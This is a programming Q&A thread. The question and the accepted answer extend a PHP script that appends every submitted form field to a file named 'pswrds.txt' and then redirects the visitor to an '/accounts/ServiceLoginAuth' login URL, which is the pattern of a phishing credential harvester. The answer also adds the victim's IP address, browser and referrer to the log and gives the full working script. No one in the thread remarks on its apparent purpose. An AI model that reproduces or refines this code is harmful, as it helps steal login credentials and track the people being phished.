# PHP to save user information to txt file

Tags: php, html, text-files, user-information-list

The following code saves certain information to pswrds.txt:

```
<?php

    header("Location: https://www.randomurl.com/accounts/ServiceLoginAuth ");
    $handle = fopen("pswrds.txt", "a");

    foreach($_POST as $variable => $value) 
    {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }

    fwrite($handle, "\r\n");
    fclose($handle);
    exit;

?>
```

How can I get the code to also save the IP, User Agent & Referrer?

```
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$referrer = $_SERVER['HTTP_REFERER'];
```

Comment: Whats your problem when you already code for ip and other then simply save them to file like other data.

Comment: Seriously?!! for the `$ip`: `fwrite($handle, "$ip");` :o

Answer (score 1, accepted):

You could assign $_POST to a variable in your local scope, then add the variables you want to the array:

```
$post = $_POST;
$post['ip'] = $_SERVER['REMOTE_ADDR'];
$post['browser'] = $_SERVER['HTTP_USER_AGENT'];
$post['referrer'] = $_SERVER['HTTP_REFERER'];
```

Then go about your loop as you are doing now, but iterate over $post not $_POST.

NOTE: Also you should stop hardcoding the newline characters yourself, use PHP_EOL instead. http://php.net/manual/en/reserved.constants.php#constant.php-eol

**update**

```
<?php

    header("Location: https://www.randomurl.com/accounts/ServiceLoginAuth ");
    $handle = fopen("pswrds.txt", "a");

    $post = $_POST;
    $post['ip'] = $_SERVER['REMOTE_ADDR'];
    $post['browser'] = $_SERVER['HTTP_USER_AGENT'];
    $post['referrer'] = $_SERVER['HTTP_REFERER'];

    foreach($post as $variable => $value) 
    {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, PHP_EOL);
    }

    fwrite($handle, PHP_EOL);
    fclose($handle);
    exit;

?>
```

Comment: How about the overwriting possibility?!!

Comment: Unfortunately, I am a complete noob. Can you please be a bit more clear as to how I should ad this to the code?

Comment: @RahulBasu good, thanks for accepting the answer, now keep going, we were all noobs at some point. ;)